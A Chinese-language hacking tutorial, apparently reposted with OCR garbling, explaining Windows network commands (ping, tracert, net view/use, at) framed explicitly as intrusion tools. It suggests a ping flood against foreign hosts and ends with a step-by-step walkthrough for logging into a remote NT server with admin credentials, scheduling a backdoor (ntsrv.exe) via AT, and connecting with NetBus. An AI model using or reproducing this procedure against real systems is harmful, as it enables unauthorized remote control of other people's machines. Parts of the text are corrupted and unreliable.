《一些常用基础网络入侵命令》由会员分享,可在线阅读,更多相关《一些常用基础网络入侵命令(5页珍藏版)》请在金锄头文库上搜索。
1、网络女全较有关系的儿个命令有:ping winipcfg tracert netat netstat1. ping:这是TCP/IP协议中最有用的命令之一它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远 程主机很有用,它返冋的结果表示是否能到达主机,怙主机发送一个返冋数据包需要多长时 间。Usage: ping -t-a-n count-1 size -fE-i TTL -vTOS-r count E-s count -j host-list -k host-list E-w timeout destination-listOptions:-t Ping the
2、 specifed host until interrupted.(除非人为巾止,否则一直 ping 下去)-a Resolve addresses to hostnames.(把 IP 转为主机名)-n count Number of echo requests to send.(响应请求的数量)-1 size Send buffer size.(封包的大小)-f Set Dont Fragment flag in packet.(信息包中无碎片)-i TTL Time To Live.(时间)-v TOS Type Of Service.(服务类型)-r count Record rout
3、e for count hops.-s count Timestamp for count hops.-j host-list Loose source route along host-list.-k host-list Strict source route along host-list.(较严格的唉,怎么译好算了,放着吧)-w timeout Timeout in milliseconds to wait for each reply. (timeout 的吋间)比如大家可能都知道的一个命令# ping -f -s 65000 *.*.*.*或者前阶段大家所谓 ping死霉国佬时所用的
4、命令(当然这样只会造成我方自己的网络阻塞)。其实这个命令主要是用来看对方应答的速度,如果怎么ping得到的结果都足request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。2. winipcfg:这是川來看自己IP位址的小工具,win98自带,NT里则网络监视器里就能看到IP 了,还 有个小实用程序叫好象是叫IPCONFIG吧,没怎么用,都快忘了这种东东网上其 实相当之多,但既然“自带”,又何须外求,何况网上下载的黑客的东东里有没有特洛伊犹 未可知,再说了,如果你不是在自己的“爱姬”上运行,岂不是就没法干活? 一一哈,不好 意思,跑题了,但一一接着跑两句:可以把
5、一些常用的、经典的工具上传到网上,当作一个 备份,什么时候在网吧、某家公司要干活的话,直接下载就是一个完整无缺的工具包了。 这个东东相当简单,直接在DOS下键入命令就是了,没有什么参数。3. tracert:是验证通往远程主机路径的实用程序用法: tracert -d-h maximum_hops -j host-list-w timeout target一name参数:-d Do not resolve addresses to hostnames.(不将 IP 转为主机名)-h maximum_hops Maximum number of hops to search for target
6、.(最大S艮数)-j host-list Loose source route along host-list.-w timeout Wait timeout milliseconds for each reply, (time out 的吋间)最简单的用法就足tracert hostname其中hostname是计算机名或你想跟踪其*路径的计算机 的IP地址。TRACERT将返冋数据包借以到达最终H的地的各种IP地址,你知道该怎么利 用它吗?我略为解释一下吧:跟踪通往210.142.192.130的路由,最大30:第一行:*&%&*我就是从这里出去的(呵,真不想说 第网行:是不是快要出国了呢
7、?第九行:呀!这是日本鬼子的地盘4. net:这可是个非常棒的东西,如果不会用的话,赶紧睁大眼睛噢这个命令的语法是:可用的命令包括:NET ACCOUNTS NET HELP NET SHARENET COMPUTER NET HELFMSG NET STARTNET CONFIG NET LOCALGROUP NET STATISTICSNET CONFIG SERVER NET NAME NET STOPNET CONFIG WORKSTATION NET PAUSE NET TIMENET CONTINUE NET PRINT NET USENET FILE NET SEND NET U
8、SERNET GROUP NET SESSION NET VIEWNET HELP SERVICES列出用户可以启动的网络服务。NET HELP SYNTAX解释如何阅读NET HELP语法行。NET HELP command MORE用于逐屏显示帮助。我可就不逐样解释了一一这样会把我的手指累坏,就说说常用的两个命令吧 view这个命令的语法是:NET VIEW computemame /DOMAIN : domainnameNET VIEW / NETWORK: NW computemameNET VIEW用于显示一个计算机上共享资源的列表。当不带选项使用本命令时,它就会显示当前域或网络上的
9、计算机上的列表。computername指用户祐望浏览其共亨资源的H算机。/ DOMAIN: domainname指定用户希望浏览有效的计算机所在的域。如果省略/域名, 就会显示局域网络上的所有域。/NETWORK: NW显示NetWare网络上所有可用的服务器。如果指定了一个计算 机名,就会显示NetWare M络中那个计算机上的可用资源。至于举例嘛,比如你知道一个远程计算机*.*.*.*上有开资源共享,那么运行net view * * * * 就可以了 use这个命令的诏法是:NET USE devicename *computernamesharename volumepassword
10、*/USER: domainname username/ DELETE / PERSISTENT: YES NONET USE devicename password * / HOMENET USE / PERSISTENT: YES NONET USE用于将计算机与共享的资源相连接,或者切断计算机与共享资源的 连接。当不带选项使用本命令时,它会列出计算机的连接。devicename指定一个名字以便与资源相连接,或者指定要切断的设备。有两种类型 的设备名:磁盘驱动器(D:至Z:)和打印机(LPT1:至LPT3:)o输入 一个星号来代替一个指定的设备名可以分配下一个可用设备名。computern
11、ame指控制共亨资源的计机的名字。如果计算机名中包含有空字符,就要将双反斜线()和计算机名一起用引号(”)括起来。计算机名 可以有1到15个字符。sharename指共享资源的网络名字。volume指定一个服务器上的NetWare卷。用户必须安装Netware的客户服务 (Windows NT工作站)或者Netware的网关服务(WindowsNT服务 器)并使之与NetWare服务器相连。password指访问共享资源所需要的密码。*进行密码提示。当在密码提示符下输入密码时,密码是不会显示的。 /USER指定连接时的一个不同的用户名。domainname指定另外一个域。如果缺省域,就会使用当
12、前登录的域。 username指定登录的用户名。/HOME将用户与他们的宿主目录相连。/ DELETE収消一个网络连接,并且从永久连接列表中删除该连接。/ PERSISTENT校制对永久网络连接的使用。其缺宵值是最近使用的没置。 YES在连接产生时保存它们,并在下次登录时恢复它们。NO不保存正在产生的连接或后续的连接;现有的连接将在下次登录时被 恢复。可以使用/DELETE选项开关来删除永久连接。PS:前两天在绿色兵团的贴子里见到一位仁兄的话,与这个命令有异曲共工之妙,也说明 一个大概:在浏览器中输入 file: / / / *.*.*.*CY则网上共享的C盘内容就会显示出来了,就仿佛用浏览器
13、上FTP站点看到的一样。各位不 妨试试,还可试试举一反三5. at:排定在特定的日期和时间运行某些命令和程序。运行AT命令之前必须先启动Schedule服务。瞧,现炒就得现卖,刚学了 net命令,但这 个start命令我可没详述,自己看看帮助文件,摸索一下各种命令的用法吧。C:net start scheduleSchedule正在启动服务.Schedulw服务启动成功。AT computername id /DELETE / DELETE /YESAT computername time / INTERACTIVE/ EVERY: date ,/ NEXT: date ,. commandc
14、omputername指定近程计算机。如果省略这个参数命令会被排定在本机上运行。id指定给排定进度命令的识别号。/delete删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的 命令都会被删除。/yes用于删除所有作业,且不想在运行删除时显示确认信息。time指定命令运行的吋间。/ interactive允许作业在运行时,与川户通过桌面交互。/every: date ,.指定在每周或每月的某日(或某儿円)运行命令。如果省略H期,则默认为在每月的本H运行。/ next: date ,.指定在下一个指定日期(如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。comman
15、d1准备运行的WindowsNT命令或批处理文件。知道了如何使川AT,再來看看如何在远程NT上运行ntsrv.exe:1利用管理员登陆到目的服务器,方法为:net use x.x.x.xipcY adminpwd / user: Hadminu$ern (这里具体方法可参见KILLUSA的文章HOW TO GET IN NT)2 利用 ntsrv.exe 启动远程:netsvc x.x.x.x schedule / start3利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用 letmein.exe得到服务器的时间,然后: at x.x.x.x ()0: 00 ntsrv.exe / port: 64321其中00: 00要改为用letmein.exe得冋来的具体时间+点容量,等一会后,再在本地启动 netbus.exe,键入0的服务器得ip地址或hostname
